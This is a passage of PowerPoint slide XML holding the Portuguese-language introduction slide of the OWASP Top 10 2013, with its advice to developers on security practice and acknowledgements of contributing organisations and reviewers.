                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Os itens Top 10 são selcionados e priorizados </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>de acordo com dados de prevalência</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>em combinação com estimativas do consenso da exploração, detecção e impacto</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>O objetivo principal</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> do </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>OWASP Top 10 é educar desenvolvedores, projetistas, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>arquitetos, gestores e organizações sobre as consequências das mais importantes vulnerabilidades de segurança de aplicações web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. O Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>fornece técnicas básicas para se proteger contra essas áreas problemáticas de alto risco </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>e também fornece orientação sobre onde ir a partir daqui</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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677459885"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3581401"/>
          <a:ext cx="3352800" cy="5562599"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="343855">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>Avisos</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="52187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t>Não pare nos 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>Existem centenas de problemas que podem afetar a segurança geral de uma aplicação web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> como discutido no </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Guia do Desenvolvedor OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> e na </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Série de Dicas OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Estas são leituras essenciais para o desenvolvimento de aplicações </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>web. Orientação sobre como encontrar,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de forma efetiva, vulnerabilidades em aplicações web é fornecida no </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Guia de Testes OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> e no </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Guia de Revisão de Código OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
                        <a:t>Mudança constant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. Este Top 10 continuará sendo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> alterado</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Mesmo sem alterar uma linha de código da sua aplicação, ela poderá ficar vulnerável a novas falhas que são descobertas e métodos de ataque que são refinados</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. Por favor, revise a orientação</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> no final deste documento </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>em “Próximos Passos para Desenvolvedores, Verificadores</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> e Organizações</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0" smtClean="0"/>
                        <a:t>” para maiores</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> informações</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Pense positivo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Quando você estiver pronto para parar de procurar vulnerabilidades e focar no estabelecimento de fortes controles de segurança nas suas aplicações, O</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>WASP produziu o </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Padrão de Verificação de Segurança em Applicações (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> como um guia de</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> verificação para </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>as organizações</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="500" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
                        <a:t>Use ferramentas de forma inteligente</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. V</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>ulnerabilidades de segurança podem ser bastante complexas e enterradas em montanhas de código. Em muitos casos, a abordagem com melhor custo-benefício para encontrar e eliminar estas vulnerabilidades é envolver especialistas armados com boas ferramentas.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
                        <a:t>Mude de rumo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. Concentre-se</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> em tornar a segurança parte integral da cultura de desenvolvimento da organização</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Encontre mais no </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Modelo Aberto de Maturidade e Garantia do Software (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Rugged Handbook</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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168546417"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="3581400"/>
          <a:ext cx="3429000" cy="5562600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="348604">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Agradecimentos</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="52139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700" kern="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t>Obrigado à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Aspect Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> por iniciar, liderar e atualizar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> o OWASP Top 10 desde sua concepção em 2003, e a seus autores principais: Jeff Williams and Dave Wichers.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Gostaríamos de agradecer às organizações que contribuíram com seus dados de prevalência para esta atualização de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>2013:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                      </a:br>
                      <a:endParaRPr lang="en-US" sz="600" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Aspect Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>Estatísticas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>HP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Estatísticas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> from both Fortify and WebInspect</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>Minded Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>Estatísticas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>Softtek</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId18"/>
                        </a:rPr>
                        <a:t>Estatísticas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId19"/>
                        </a:rPr>
                        <a:t>Trustwave, SpiderLabs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId20"/>
                        </a:rPr>
                        <a:t>Estatísticas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>  (See page 50)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId21"/>
                        </a:rPr>
                        <a:t>Veracode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId22"/>
                        </a:rPr>
                        <a:t>Estatísticas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId23"/>
                        </a:rPr>
                        <a:t>WhiteHat Security Inc.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId24"/>
                        </a:rPr>
                        <a:t>Estatísticas</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="1"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600" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Nós gostaríamos de agradecer todos que contribuíram com as versões anteriores do Top 10. Sem estas contribuições, ele </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>não seria o que é hoje</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. Também agradecemos aqueles que contribuíram com comentários e tempo revisando esta atualização:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Adam Baso (Wikimedia Foundation)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Mike Boberski (Booz Allen Hamilton)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Torsten Gigler</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Neil Smithline – (MorphoTrust USA) Pela produção da versão wiki do Top 10, e fornecendo feedback</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="228600" marR="0" lvl="1"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600" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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 typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>E finalmente, agradecemos antecipadamente todos os tradutores que irão traduzir esta versão do Top 10 em inúmeras linguagens diferentes, ajudando a torná-lo mais acessível no planeta inteiro.</a:t>
                      </a:r>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Introdução</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId25" cstate="print">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
